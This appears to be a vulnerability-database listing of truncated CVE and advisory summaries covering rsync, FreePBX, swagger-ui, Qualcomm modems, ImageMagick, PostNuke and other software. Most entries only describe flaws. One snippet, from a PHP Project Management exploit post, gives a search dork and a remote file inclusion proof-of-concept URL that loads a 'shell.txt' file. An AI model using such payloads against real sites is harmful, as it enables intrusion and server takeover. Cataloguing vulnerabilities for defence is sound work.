SUSE CVE-2026-43619

Rsync version 3.4.2 and prior contain symlink race condition vulnerabilities in path-based system calls including chmod, lchown, utimes, rename, unlink, mkdir, symlink, mknod, link, rmdir, and lstat that allow local attackers to redirect operations to files outside the exported rsync module...

EUVD-2022-37829

Malicious code in bioql PyPI...

CVE-2024-53564

A vulnerability was discovered in FreePBX 17.0.19.17. It does not verify the type of uploaded valid FreePBX module files, allowing high-privilege administrators to insert unwanted files. NOTE: the Supplier's position is that there is no risk beyond what high-privilege administrators are...

Default swagger-ui configuration exposes all files in the module

Impact The default configuration of @fastify/swagger-ui without baseDir set will lead to all files in the module's directory being exposed via http routes served by the module. Patches Update to v2.1.0 Workarounds Use the baseDir option References HackerOne report...

Swagger UI Security Vulnerability

Swagger UI is an open source tool that supports visualizing and being able to interact with API resources. A security vulnerability exists in Swagger UI versions prior to v2.1.0, which stems from the default swagger-ui configuration exposing all files in the module...

Qualcomm Chipsets 资源管理错误漏洞

Qualcomm Chipsets are a family of chipsets from Qualcomm Incorporated USA. A security vulnerability exists in Qualcomm Chipsets that stems from a double release issue when parsing PKCS15 sim files, resulting in memory corruption in the Modem...

PT-2023-18292 · Qualcomm · Sd205 Firmware +254

Name of the Vulnerable Software and Affected Versions: No specific software or versions are mentioned in the provided descriptions. Description: The issue is related to memory corruption in a modem, caused by a double free error that occurs while parsing PKCS15 sim files. Recommendations: At the...

CVE-2017-17440

GNU Libextractor 1.6 allows remote attackers to cause a denial of service NULL pointer dereference and application crash via a crafted GIF, IT Impulse Tracker, NSFE, S3M Scream Tracker 3, SID, or XM eXtended Module file, as demonstrated by the EXTRACTORxmextractmethod function in...

CVE-2014-9243

Multiple cross-site scripting XSS vulnerabilities in WebsiteBaker 2.8.3 allow remote attackers to inject arbitrary web script or HTML via the 1 QUERYSTRING to wb/admin/admintools/tool.php or 2 sectionid parameter to editmodulefiles.php, 3 news/addpost.php, 4 news/modifygroup.php, 5...

CVE-2014-9243

Multiple cross-site scripting XSS vulnerabilities in WebsiteBaker 2.8.3 allow remote attackers to inject arbitrary web script or HTML via the 1 QUERYSTRING to wb/admin/admintools/tool.php or 2 sectionid parameter to editmodulefiles.php, 3 news/addpost.php, 4 news/modifygroup.php, 5...

Winamp < 5.59 Build 3033 Multiple Vulnerabilities

Binary data 5689.prm...

DEBIAN-CVE-2007-6720

libmikmod 3.1.9 through 3.2.0, as used by MikMod, SDL-mixer, and possibly other products, relies on the channel count of the last loaded song, rather than the currently playing song, for certain playback calculations, which allows user-assisted attackers to cause a denial of service application...

phppm-rfilfi.txt

PHP Project Management = 0.8.10 Multiple RFI / LFI Vulnerabilities http://surfnet.dl.sourceforge.net/sourceforge/php-pm/release-0.8.tar.gz DORK : "PHP Project Management 0.8.10" POC : RFI /modules/certinfo/index.php?fullpath=http://localhost/shell.txt?...

iDefense Security Advisory 09.19.07: Multiple Vendor ImageMagick Multiple Denial of Service Vulnerabilities

Multiple Vendor ImageMagick Multiple Denial of Service Vulnerabilities iDefense Security Advisory 09.19.07 http://labs.idefense.com/intelligence/vulnerabilities/ Sep 19, 2007 I. BACKGROUND ImageMagick is a suite of image manipulation tools animate, composite, conjure, convert, display, identify,...

DEBIAN-CVE-2006-4046

Multiple stack-based buffer overflows in Open Cubic Player 2.6.0pre6 and earlier for Windows, and 0.1.10rc5 and earlier on Linux/BSD, allow remote attackers to execute arbitrary code via 1 a large .S3M file handled by the mpLoadS3M function, 2 a crafted .IT file handled by the...

PT-2005-2673 · Postnuke · Postnuke

Name of the Vulnerable Software and Affected Versions: PostNuke versions 0.750 through 0.760RC3 Description: The issue allows remote attackers to obtain sensitive information via direct requests to various files, including theme.php and Xanthia.php in the Xanthia module, multiple files in the...